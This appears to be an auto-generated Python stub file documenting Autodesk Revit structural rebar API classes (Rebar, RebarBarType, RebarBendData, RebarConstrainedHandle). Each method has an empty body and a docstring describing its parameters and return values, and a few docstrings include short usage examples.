have the default shape parameters from the RebarShape, and its location is based on the bounding box of the shape in the shape definition. Hooks are removed from the shape before computing its bounding box. If appropriate hooks can be found in the document, they will be assigned arbitrarily. doc: A document. rebarShape: A RebarShape element that defines the shape of the rebar. barType: A RebarBarType element that defines bar diameter, bend radius and material of the rebar. host: The element to which the rebar belongs. The element must support rebar hosting; see Autodesk.Revit.DB.Structure.RebarHostData. origin: The lower-left corner of the shape's bounding box will be placed at this point in the project. xVec: The x-axis in the shape definition will be mapped to this direction in the project. yVec: The y-axis in the shape definition will be mapped to this direction in the project. Returns: The newly created Rebar instance, or ll if the operation fails. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def DoesBarExistAtPosition(self, barPosition): """ DoesBarExistAtPosition(self: Rebar, barPosition: int) -> bool Checks whether a bar exists at the specified position. barPosition: A bar position index between 0 and NumberOfBarPositions-1. """ pass def FindMatchingPredefinedPresentationMode(self, dBView): """ FindMatchingPredefinedPresentationMode(self: Rebar, dBView: View) -> RebarPresentationMode Determines if there is a matching RebarPresentationMode for the current set of selected hidden and unhidden bars assigned to the given view. dBView: The view. Returns: The presentation mode that matches the current set of selected hidden and unhidden bars. If there is no better match, this returns RebarPresentationMode.Select. """ pass def GetBarPositionTransform(self, barPositionIndex): """ GetBarPositionTransform(self: Rebar, barPositionIndex: int) -> Transform Return a transform representing the relative position of any individual bar in the set. barPositionIndex: An index between 0 and (NumberOfBarPositions-1). 
Returns: The position of a bar in the set relative to the first position. """ pass def GetBendData(self): """ GetBendData(self: Rebar) -> RebarBendData Gets the RebarBendData, containing bar and hook information, of the instance. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetCenterlineCurves(self, adjustForSelfIntersection, suppressHooks, suppressBendRadius, multiplanarOption=None, barPositionIndex=None): """ GetCenterlineCurves(self: Rebar, adjustForSelfIntersection: bool, suppressHooks: bool, suppressBendRadius: bool) -> IList[Curve] A chain of curves representing the centerline of the rebar. adjustForSelfIntersection: If the curves overlap, as in a planar stirrup, this parameter controls whether they should be adjusted to avoid intersection (as in fine views), or kept in a single plane for simplicity (as in coarse views). suppressHooks: Identifies if the chain will include hooks curves. suppressBendRadius: Identifies if the connected chain will include unfilleted curves. Returns: The centerline curves or empty array if the curves cannot be computed because the parameters values are inconsistent with the constraints of the RebarShape definition. GetCenterlineCurves(self: Rebar, adjustForSelfIntersection: bool, suppressHooks: bool, suppressBendRadius: bool, multiplanarOption: MultiplanarOption) -> IList[Curve] A chain of curves representing the centerline of the rebar. adjustForSelfIntersection: If the curves overlap, as in a planar stirrup, this parameter controls whether they should be adjusted to avoid intersection (as in fine views), or kept in a single plane for simplicity (as in coarse views). suppressHooks: Identifies if the chain will include hooks curves. suppressBendRadius: Identifies if the connected chain will include unfilleted curves. multiplanarOption: If the Rebar is a multi-planar shape, this parameter controls whether to generate only the curves in the primary plane (IncludeOnlyPlanarCurves), or to generate all curves, (IncludeAllMultiplanarCurves) including the out-of-plane connector segments as well as multi-planar copies of the primary plane curves. This argument is ignored for planar shapes. Returns: The centerline curves or empty array if the curves cannot be computed because the parameters values are inconsistent with the constraints of the RebarShape definition. GetCenterlineCurves(self: Rebar, adjustForSelfIntersection: bool, suppressHooks: bool, suppressBendRadius: bool, multiplanarOption: MultiplanarOption, barPositionIndex: int) -> IList[Curve] A chain of curves representing the centerline of the rebar. adjustForSelfIntersection: If the curves overlap, as in a planar stirrup, this parameter controls whether they should be adjusted to avoid intersection (as in fine views), or kept in a single plane for simplicity (as in coarse views). suppressHooks: Identifies if the chain will include hooks curves. suppressBendRadius: Identifies if the connected chain will include unfilleted curves. multiplanarOption: If the Rebar is a multi-planar shape, this parameter controls whether to generate only the curves in the primary plane (IncludeOnlyPlanarCurves), or to generate all curves, (IncludeAllMultiplanarCurves) including the out-of-plane connector segments as well as multi-planar copies of the primary plane curves. This argument is ignored for planar shapes. barPositionIndex: An index between 0 and (NumberOfBarPositions-1). 
Use the barPositionIndex to obtain all the curves at a specific index in the distribution. You can use GetNumberOfBarPositions() to verify if a specific rebar has more than one bar positions. Use GetDistributionType() to probe if the bars in a specific rebar have a varying shape. If so, you can retrieve the centerline curve geometry of that particular bar, by passing the appropriate index. When the distribution type of a rebar set is uniform, the form of the bars does not vary from one index to another. Returns: The centerline curves or empty array if the curves cannot be computed because the parameters values are inconsistent with the constraints of the RebarShape definition. """ pass def GetCouplerId(self, end): """ GetCouplerId(self: Rebar, end: int) -> ElementId Get the id of the Rebar Coupler that is applied to the rebar at the specified end. end: 0 for the start Rebar Coupler, 1 for the end Rebar Coupler. Returns: The id of a Rebar Coupler, or invalidElementId if the rebar has no Rebar Coupler at the specified end. """ pass def GetDistributionPath(self): """ GetDistributionPath(self: Rebar) -> Line The distribution path of a rebar set. Returns: A line beginning at (0, 0, 0) and representing the direction and length of the set. """ pass def GetEndTreatmentTypeId(self, end): """ GetEndTreatmentTypeId(self: Rebar, end: int) -> ElementId Get the id of the EndTreatmentType to be applied to the rebar. end: 0 for the start end treatment, 1 for the end end treatment. Returns: The id of a EndTreatmentType, or invalidElementId if the rebar has no end treatment at the specified end. """ pass def GetFullGeometryForView(self, view): """ GetFullGeometryForView(self: Rebar, view: View) -> GeometryElement Generates full geometry for the Rebar for a specific view. view: The view in which the geometry is generated. Returns: The generated geometry of the Rebar before cutting is applied. """ pass def GetHookOrientation(self, iEnd): """ GetHookOrientation(self: Rebar, iEnd: int) -> RebarHookOrientation Returns the orientation of the hook plane at the start or at the end of the rebar with respect to the orientation of the first or the last curve and the plane normal. iEnd: 0 for the start hook, 1 for the end hook. Returns: Value = Right: The hook is on your right as you stand at the end of the bar, with the bar behind you, taking the bar's normal as "up." Value = Left: The hook is on your left as you stand at the end of the bar, with the bar behind you, taking the bar's normal as "up." """ pass def GetHookTypeId(self, end): """ GetHookTypeId(self: Rebar, end: int) -> ElementId Get the id of the RebarHookType to be applied to the rebar. end: 0 for the start hook, 1 for the end hook. Returns: The id of a RebarHookType, or invalidElementId if the rebar has no hook at the specified end. """ pass def GetHostId(self): """ GetHostId(self: Rebar) -> ElementId The element that contains the rebar. Returns: The element that the rebar object belongs to, such as a structural wall, floor, foundation, beam, brace or column. """ pass def GetParameterValueAtIndex(self, paramId, barPositionIndex): """ GetParameterValueAtIndex(self: Rebar, paramId: ElementId, barPositionIndex: int) -> ParameterValue Get the parameter value for a bar at the specified index. The parameter Id. The bar index in the rebar distribution. Accepts only values between 0 and NumberOfBarPositions-1. The ParameterValue for given parameterId and barPositionIndex. Throws exception if barPositionIndex is outside boundaries. 
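Example (an illustrative sketch of iterating the bar positions described above, not generated from the assembly; rebar is assumed to be an existing Rebar element):

    from Autodesk.Revit.DB.Structure import MultiplanarOption

    for i in range(rebar.NumberOfBarPositions):
        if not rebar.DoesBarExistAtPosition(i):
            continue
        curves = rebar.GetCenterlineCurves(False, False, False,
                                           MultiplanarOption.IncludeOnlyPlanarCurves, i)
        print('bar %d: %d centerline curves' % (i, curves.Count))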
""" pass def GetPresentationMode(self, dBView): """ GetPresentationMode(self: Rebar, dBView: View) -> RebarPresentationMode Gets the presentation mode for this rebar set when displayed in the given view. dBView: The view. Returns: The presentation mode. """ pass def GetRebarConstraintsManager(self): """ GetRebarConstraintsManager(self: Rebar) -> RebarConstraintsManager Returns an object for managing the external constraints on the Rebar element """ pass def GetReinforcementRoundingManager(self): """ GetReinforcementRoundingManager(self: Rebar) -> RebarRoundingManager Returns an object for managing reinforcement rounding override settings. Returns: The rounding manager. """ pass def HasPresentationOverrides(self, dBView): """ HasPresentationOverrides(self: Rebar, dBView: View) -> bool Identifies if this Rebar has overridden default presentation settings for the given view. dBView: The view. Returns: True if this Rebar has overriden default presentation settings, false otherwise. """ pass def HookAngleMatchesRebarShapeDefinition(self, iEnd, proposedHookId): """ HookAngleMatchesRebarShapeDefinition(self: Rebar, iEnd: int, proposedHookId: ElementId) -> bool Checks that the hook angle of the specified RebarHookType matches the hook angle used in the Rebar's RebarShape at the specified end of the bar. iEnd: 0 for the start hook, 1 for the end hook. proposedHookId: The Id of the RebarHookType Returns: Returns true if the hook angle of the RebarHookType matches the angle used in the RebarShape at the specified end of the bar. """ pass def IsBarHidden(self, view, barIndex): """ IsBarHidden(self: Rebar, view: View, barIndex: int) -> bool Identifies if a given bar in this rebar set is hidden in this view. view: The view. barIndex: The index of the bar from this rebar set. Returns: True if the bar is hidden in this view, false otherwise. """ pass def IsRebarInSection(self, dBView): """ IsRebarInSection(self: Rebar, dBView: View) -> bool Identifies if this Rebar is shown as a cross-section in the given view. dBView: The view. Returns: True if this Rebar is shown as a cross-section, false otherwise. """ pass def IsSolidInView(self, view): """ IsSolidInView(self: Rebar, view: View3D) -> bool Checks if this rebar element is shown solidly in a 3D view. view: The 3D view element Returns: True if rebar is shown solidly, false otherwise. """ pass def IsUnobscuredInView(self, view): """ IsUnobscuredInView(self: Rebar, view: View) -> bool Checks if this rebar element is shown unobscured in a view. view: The view element Returns: True if rebar is shown unobscured, false otherwise. """ pass @staticmethod def RebarShapeMatchesCurvesAndHooks(rebarShape, barType, norm, curves, startHook, endHook, startHookOrient, endHookOrient): """ RebarShapeMatchesCurvesAndHooks(rebarShape: RebarShape, barType: RebarBarType, norm: XYZ, curves: IList[Curve], startHook: RebarHookType, endHook: RebarHookType, startHookOrient: RebarHookOrientation, endHookOrient: RebarHookOrientation) -> bool """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def ScaleToBox(self, origin, xVec, yVec): """ ScaleToBox(self: Rebar, origin: XYZ, xVec: XYZ, yVec: XYZ) Move and resize the bar to fit within a specified box. The arguments are interpreted as an arbitrary rectangle in 3D with vertices: origin, origin+xVec, origin+xVec+yVec, origin+yVec. The algorithm then proceeds as follows. 
First the bar is given the default values of the shape parameters from the shape definition. Then, if it is possible to do so without violating the shape definition, the parameter values are scaled so that the width and height of the shape (including bar thickness) match the lengths of xVec and yVec. If there is no way to do this within the shape definition due to overconstraining, a compromise is attempted, such as scaling the whole shape until either the width or the height is correct. Finally the shape is rotated to match the coordinate system of the box. The algorithm is the same one used in one-click placement. origin: One corner of the rectangle. xVec: Vector representing the first edge of the rectangle. The length must be positive. yVec: Vector representing the second edge of the rectangle. Must be perpendicular to xVec. """ pass def ScaleToBoxFor3D(self, origin, xVec, yVec, height): """ ScaleToBoxFor3D(self: Rebar, origin: XYZ, xVec: XYZ, yVec: XYZ, height: float) Move and resize a spiral or multiplanar instance to fit within a specified box. The arguments are interpreted as an arbitrary rectangle in 3D with vertices: origin, origin+xVec, origin+xVec+yVec, origin+yVec. One end of the rebar shape is inscribed in this rectangle following the procedure described for the ScaleToBox method. The other end is placed in the parallel plane at distance (center-to-center) given by the height argument, in the direction of (xVec x yVec). Note that spiral shapes interpret the input arguments using a different convention than multiplanar shapes. For spiral shapes, the spiral start will be placed in the rectangle defined by origin, xVec, yVec, and the end of the spiral will be placed in the parallel plane. For multiplanar shapes, the rebar is placed with its primary shape definition located in the parallel plane defined by the height argument, and its connector segments extending in the direction opposite (xVec x yVec). This method replaces ScaleToBoxForSpiral() from prior releases. origin: One corner of the rectangle. xVec: Vector representing the first edge of the rectangle. The length must be positive. yVec: Vector representing the second edge of the rectangle. Must be perpendicular to xVec. height: New value for the Height or MultiplanarDepth property. """ pass def SetBarHiddenStatus(self, view, barIndex, hide): """ SetBarHiddenStatus(self: Rebar, view: View, barIndex: int, hide: bool) Sets the bar in this rebar set to be hidden or unhidden in the given view. view: The view. barIndex: The index of the bar from this set. hide: True to hide this bar in the view, false to unhide the bar. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetHookOrientation(self, iEnd, hookOrientation): """ SetHookOrientation(self: Rebar, iEnd: int, hookOrientation: RebarHookOrientation) Defines the orientation of the hook plane at the start or at the end of the rebar with respect to the orientation of the first or the last curve and the plane normal. iEnd: 0 for the start hook, 1 for the end hook. hookOrientation: Only two values are permitted: Value = Right: The hook is on your right as you stand at the end of the bar, with the bar behind you, taking the bar's normal as "up." Value = Left: The hook is on your left as you stand at the end of the bar, with the bar behind you, taking the bar's normal as "up." 
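Example (an illustrative sketch, not generated from the assembly; rebar and hook_type_id are placeholder names and a Transaction is assumed to be open):

    from Autodesk.Revit.DB.Structure import RebarHookOrientation

    if rebar.CanUseHookType(hook_type_id):
        rebar.SetHookTypeId(0, hook_type_id)                    # 0 = start of the bar
        rebar.SetHookOrientation(0, RebarHookOrientation.Left)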
""" pass def SetHookTypeId(self, end, hookTypeId): """ SetHookTypeId(self: Rebar, end: int, hookTypeId: ElementId) Set the id of the RebarHookType to be applied to the rebar. end: 0 for the start hook, 1 for the end hook. hookTypeId: The id of a RebarHookType element, or invalidElementId if the rebar should have no hook at the specified end. """ pass def SetHostId(self, doc, hostId): """ SetHostId(self: Rebar, doc: Document, hostId: ElementId) The element that contains the rebar. doc: The document containing both this element and the host element. hostId: The element that the rebar object belongs to, such as a structural wall, floor, foundation, beam, brace or column. The rebar does not need to be strictly inside the host, but it must be assigned to one host element. """ pass def SetLayoutAsFixedNumber(self, numberOfBarPositions, arrayLength, barsOnNormalSide, includeFirstBar, includeLastBar): """ SetLayoutAsFixedNumber(self: Rebar, numberOfBarPositions: int, arrayLength: float, barsOnNormalSide: bool, includeFirstBar: bool, includeLastBar: bool) Sets the Layout Rule property of rebar set to FixedNumber. numberOfBarPositions: The number of bar positions in rebar set arrayLength: The distribution length of rebar set barsOnNormalSide: Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal includeFirstBar: Identifies if the first bar in rebar set is shown includeLastBar: Identifies if the last bar in rebar set is shown """ pass def SetLayoutAsMaximumSpacing(self, spacing, arrayLength, barsOnNormalSide, includeFirstBar, includeLastBar): """ SetLayoutAsMaximumSpacing(self: Rebar, spacing: float, arrayLength: float, barsOnNormalSide: bool, includeFirstBar: bool, includeLastBar: bool) Sets the Layout Rule property of rebar set to MaximumSpacing spacing: The maximum spacing between rebar in rebar set arrayLength: The distribution length of rebar set barsOnNormalSide: Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal includeFirstBar: Identifies if the first bar in rebar set is shown includeLastBar: Identifies if the last bar in rebar set is shown """ pass def SetLayoutAsMinimumClearSpacing(self, spacing, arrayLength, barsOnNormalSide, includeFirstBar, includeLastBar): """ SetLayoutAsMinimumClearSpacing(self: Rebar, spacing: float, arrayLength: float, barsOnNormalSide: bool, includeFirstBar: bool, includeLastBar: bool) Sets the Layout Rule property of rebar set to MinimumClearSpacing spacing: The maximum spacing between rebar in rebar set arrayLength: The distribution length of rebar set barsOnNormalSide: Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal includeFirstBar: Identifies if the first bar in rebar set is shown includeLastBar: Identifies if the last bar in rebar set is shown """ pass def SetLayoutAsNumberWithSpacing(self, numberOfBarPositions, spacing, barsOnNormalSide, includeFirstBar, includeLastBar): """ SetLayoutAsNumberWithSpacing(self: Rebar, numberOfBarPositions: int, spacing: float, barsOnNormalSide: bool, includeFirstBar: bool, includeLastBar: bool) Sets the Layout Rule property of rebar set to NumberWithSpacing numberOfBarPositions: The number of bar positions in rebar set spacing: The maximum spacing between rebar in rebar set barsOnNormalSide: Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal includeFirstBar: Identifies if the first bar in rebar set is shown 
includeLastBar: Identifies if the last bar in rebar set is shown """ pass def SetLayoutAsSingle(self): """ SetLayoutAsSingle(self: Rebar) Sets the Layout Rule property of rebar set to Single. """ pass def SetPresentationMode(self, dBView, presentationMode): """ SetPresentationMode(self: Rebar, dBView: View, presentationMode: RebarPresentationMode) Sets the presentation mode for this rebar set when displayed in the given view. dBView: The view. presentationMode: The presentation mode. """ pass def SetSolidInView(self, view, solid): """ SetSolidInView(self: Rebar, view: View3D, solid: bool) Sets this rebar element to be shown solidly in a 3D view. view: The 3D view element solid: True if rebar is shown solidly, false otherwise. """ pass def SetUnobscuredInView(self, view, unobscured): """ SetUnobscuredInView(self: Rebar, view: View, unobscured: bool) Sets this rebar element to be shown unobscured in a view. view: The view element unobscured: True if rebar is shown unobscured, false otherwise. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass ArrayLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the distribution path length of rebar set. Get: ArrayLength(self: Rebar) -> float Set: ArrayLength(self: Rebar) = value """ BarsOnNormalSide = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal. Get: BarsOnNormalSide(self: Rebar) -> bool Set: BarsOnNormalSide(self: Rebar) = value """ BaseFinishingTurns = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a spiral, the number of finishing turns at the lower end of the spiral. Get: BaseFinishingTurns(self: Rebar) -> int Set: BaseFinishingTurns(self: Rebar) = value """ DistributionType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The type of rebar distribution(also known as Rebar Set Type). Get: DistributionType(self: Rebar) -> DistributionType Set: DistributionType(self: Rebar) = value """ Height = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a spiral, the overall height. Get: Height(self: Rebar) -> float Set: Height(self: Rebar) = value """ IncludeFirstBar = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies if the first bar in rebar set is shown. Get: IncludeFirstBar(self: Rebar) -> bool Set: IncludeFirstBar(self: Rebar) = value """ IncludeLastBar = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies if the last bar in rebar set is shown. Get: IncludeLastBar(self: Rebar) -> bool Set: IncludeLastBar(self: Rebar) = value """ LayoutRule = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the layout rule of rebar set. 
Get: LayoutRule(self: Rebar) -> RebarLayoutRule """ MaxSpacing = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the maximum spacing between rebar in rebar set. Get: MaxSpacing(self: Rebar) -> float Set: MaxSpacing(self: Rebar) = value """ MultiplanarDepth = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a multiplanar rebar, the depth of the instance. Get: MultiplanarDepth(self: Rebar) -> float Set: MultiplanarDepth(self: Rebar) = value """ Normal = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """A unit-length vector normal to the plane of the rebar Get: Normal(self: Rebar) -> XYZ """ NumberOfBarPositions = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The number of potential bars in the set. Get: NumberOfBarPositions(self: Rebar) -> int Set: NumberOfBarPositions(self: Rebar) = value """ Pitch = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a spiral, the pitch, or vertical distance traveled in one rotation. Get: Pitch(self: Rebar) -> float Set: Pitch(self: Rebar) = value """ Quantity = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the number of bars in rebar set. Get: Quantity(self: Rebar) -> int """ RebarShapeId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The RebarShape element that defines the shape of the rebar. Get: RebarShapeId(self: Rebar) -> ElementId Set: RebarShapeId(self: Rebar) = value """ ScheduleMark = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Schedule Mark parameter. On creation, the Schedule Mark is set to a value that is unique to the host, but it can be set to any value. Get: ScheduleMark(self: Rebar) -> str Set: ScheduleMark(self: Rebar) = value """ TopFinishingTurns = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a spiral, the number of finishing turns at the upper end of the spiral. Get: TopFinishingTurns(self: Rebar) -> int Set: TopFinishingTurns(self: Rebar) = value """ TotalLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The length of an individual bar multiplied by Quantity. Get: TotalLength(self: Rebar) -> float """ Volume = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The volume of an individual bar multiplied by Quantity. Get: Volume(self: Rebar) -> float """ class RebarBarType(ElementType, IDisposable): """ A Rebar type object that is used in the generation of Rebar """ @staticmethod def Create(ADoc): """ Create(ADoc: Document) -> RebarBarType Creates a new RebarBarType object """ pass @staticmethod def CreateDefaultRebarBarType(ADoc): """ CreateDefaultRebarBarType(ADoc: Document) -> ElementId Creates a new RebarBarType object with a default name. ADoc: The document. Returns: The newly created type id. 
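Example (an illustrative sketch, not generated from the assembly; doc is assumed to be the active Document, a Transaction is assumed to be open, and the 20 mm diameter is an arbitrary placeholder):

    from Autodesk.Revit.DB.Structure import RebarBarType

    bar_type = RebarBarType.Create(doc)
    bar_type.Name = 'Example 20M'
    bar_type.BarDiameter = 20.0 / 304.8   # Revit stores lengths internally in feet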
""" pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def GetAutoCalcHookLengths(self, hookId): """ GetAutoCalcHookLengths(self: RebarBarType, hookId: ElementId) -> bool Identifies if the hook lengths of a hook type are automatically calculated for this bar type hookId: id of the hook type Returns: True if the hook lengths are automatically calculated, otherwise false """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetHookLength(self, hookId): """ GetHookLength(self: RebarBarType, hookId: ElementId) -> float Identifies the hook length for a hook type hookId: id of the hook type Returns: The hook length for a hook type """ pass def GetHookOffsetLength(self, hookId): """ GetHookOffsetLength(self: RebarBarType, hookId: ElementId) -> float Identifies the hook offset length for a hook type hookId: id of the hook type Returns: The hook offset length for a hook type """ pass def GetHookPermission(self, hookId): """ GetHookPermission(self: RebarBarType, hookId: ElementId) -> bool Identifies if a hook type is permitted for this bar type hookId: id of the hook type Returns: True if the hook type is permitted for this bar type, otherwise false """ pass def GetHookTangentLength(self, hookId): """ GetHookTangentLength(self: RebarBarType, hookId: ElementId) -> float Identifies the hook tangent length for a hook type hookId: id of the hook type Returns: The hook tangent length for a hook type """ pass def GetReinforcementRoundingManager(self): """ GetReinforcementRoundingManager(self: RebarBarType) -> RebarRoundingManager Returns an object for managing reinforcement rounding override settings. Returns: The rounding manager. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def SetAutoCalcHookLengths(self, hookId, autoCalculated): """ SetAutoCalcHookLengths(self: RebarBarType, hookId: ElementId, autoCalculated: bool) Identifies if the hook lengths of a hook type are automatically calculated for this bar type hookId: id of the hook type autoCalculated: True if the hook lengths should be automatically calculated, otherwise false When it is false, default hook length and default hook offset length will be reported """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetHookLength(self, hookId, hookLength): """ SetHookLength(self: RebarBarType, hookId: ElementId, hookLength: float) Identifies the hook length for a hook type hookId: id of the hook type hookLength: The hook length for a hook type """ pass def SetHookOffsetLength(self, hookId, newLength): """ SetHookOffsetLength(self: RebarBarType, hookId: ElementId, newLength: float) Identifies the hook offset length for a hook type hookId: id of the hook type newLength: The hook offset length for a hook type """ pass def SetHookPermission(self, hookId, permission): """ SetHookPermission(self: RebarBarType, hookId: ElementId, permission: bool) Identifies if a hook type is permitted for this bar type hookId: id of the hook type permission: True if the hook type should be permitted for this bar type, otherwise false """ pass def SetHookTangentLength(self, hookId, newLength): """ SetHookTangentLength(self: RebarBarType, hookId: ElementId, newLength: float) Identifies the hook tangent length for a hook type hookId: id of the hook type 
newLength: The hook tangent length for a hook type """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass BarDiameter = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Defines bar diameter of rebar Get: BarDiameter(self: RebarBarType) -> float Set: BarDiameter(self: RebarBarType) = value """ DeformationType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Defines bar deformation type. Get: DeformationType(self: RebarBarType) -> RebarDeformationType Set: DeformationType(self: RebarBarType) = value """ MaximumBendRadius = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Defines maximum bend radius of rebar Get: MaximumBendRadius(self: RebarBarType) -> float Set: MaximumBendRadius(self: RebarBarType) = value """ StandardBendDiameter = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Defines bar bend diameter for rebar whose style is standard Get: StandardBendDiameter(self: RebarBarType) -> float Set: StandardBendDiameter(self: RebarBarType) = value """ StandardHookBendDiameter = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Defines hook bend diameter for rebar whose style is standard Get: StandardHookBendDiameter(self: RebarBarType) -> float Set: StandardHookBendDiameter(self: RebarBarType) = value """ StirrupTieBendDiameter = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Defines bar and hook bend diameter for rebar whose style is stirrup/tie Get: StirrupTieBendDiameter(self: RebarBarType) -> float Set: StirrupTieBendDiameter(self: RebarBarType) = value """ class RebarBendData(object, IDisposable): """ The values in this class provide a summary of information taken from the RebarBarType, RebarHookType, and RebarStyle. RebarBendData(barType: RebarBarType, hookType0: RebarHookType, hookType1: RebarHookType, style: RebarStyle, hookOrient0: RebarHookOrientation, hookOrient1: RebarHookOrientation) RebarBendData() """ def Dispose(self): """ Dispose(self: RebarBendData) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarBendData, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, barType=None, hookType0=None, hookType1=None, style=None, hookOrient0=None, hookOrient1=None): """ __new__(cls: type, barType: RebarBarType, hookType0: RebarHookType, hookType1: RebarHookType, style: RebarStyle, hookOrient0: RebarHookOrientation, hookOrient1: RebarHookOrientation) __new__(cls: type) """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass BarDiameter = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The diameter of the bar. Get: BarDiameter(self: RebarBendData) -> float Set: BarDiameter(self: RebarBendData) = value """ BendRadius = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The radius of all fillets, except hook fillets, in the Rebar shape. Get: BendRadius(self: RebarBendData) -> float Set: BendRadius(self: RebarBendData) = value """ HookAngle0 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The angle of the hook at the start. Get: HookAngle0(self: RebarBendData) -> int Set: HookAngle0(self: RebarBendData) = value """ HookAngle1 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The angle of the hook at the end. Get: HookAngle1(self: RebarBendData) -> int Set: HookAngle1(self: RebarBendData) = value """ HookBendRadius = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The radius of the hook fillets in the Rebar shape. Get: HookBendRadius(self: RebarBendData) -> float Set: HookBendRadius(self: RebarBendData) = value """ HookLength0 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The extension length of the hook at the start. Get: HookLength0(self: RebarBendData) -> float Set: HookLength0(self: RebarBendData) = value """ HookLength1 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The extension length of the hook at the end. Get: HookLength1(self: RebarBendData) -> float Set: HookLength1(self: RebarBendData) = value """ HookOrient0 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The orientation of the hook at the start. Get: HookOrient0(self: RebarBendData) -> RebarHookOrientation Set: HookOrient0(self: RebarBendData) = value """ HookOrient1 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The orientation of the hook at the end. Get: HookOrient1(self: RebarBendData) -> RebarHookOrientation Set: HookOrient1(self: RebarBendData) = value """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarBendData) -> bool """ class RebarConstrainedHandle(object, IDisposable): """ A class representing a handle on a Rebar that can be joined to a reference, such as a host Element's surface or cover, or another Rebar's handle. """ def Dispose(self): """ Dispose(self: RebarConstrainedHandle) """ pass def GetEdgeNumber(self): """ GetEdgeNumber(self: RebarConstrainedHandle) -> int If the RebarConstrainedHandle's RebarHandleType is 'Edge,' then this function will return the number of the edge that is driven by the handle. 
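Example (an illustrative sketch, not generated from the assembly; handle is assumed to be a RebarConstrainedHandle obtained from a RebarConstraintsManager):

    if handle.IsValid() and handle.IsEdgeHandle():
        print('handle drives edge %d' % handle.GetEdgeNumber())
    else:
        print(handle.GetHandleType())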
